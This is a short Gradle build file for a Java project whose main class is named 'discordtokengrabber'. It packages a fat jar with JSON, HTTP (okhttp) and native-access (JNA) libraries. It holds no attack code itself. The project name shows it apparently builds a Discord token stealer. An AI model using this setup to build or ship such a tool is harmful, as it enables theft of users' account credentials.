plugins {
    id 'java'
    id "com.github.johnrengelman.shadow" version "7.1.2"
}

group 'com.github.dedinc'
version '2.0'

repositories {
    mavenCentral()

}

jar{
    manifest{
        attributes("Main-Class": "com.github.dedinc.discordtokengrabber.Main")
    }
}

dependencies {
    implementation 'org.json:json:20230227'
    implementation 'com.squareup.okhttp3:okhttp:4.10.0'
    implementation 'net.java.dev.jna:jna-platform:5.12.1'
}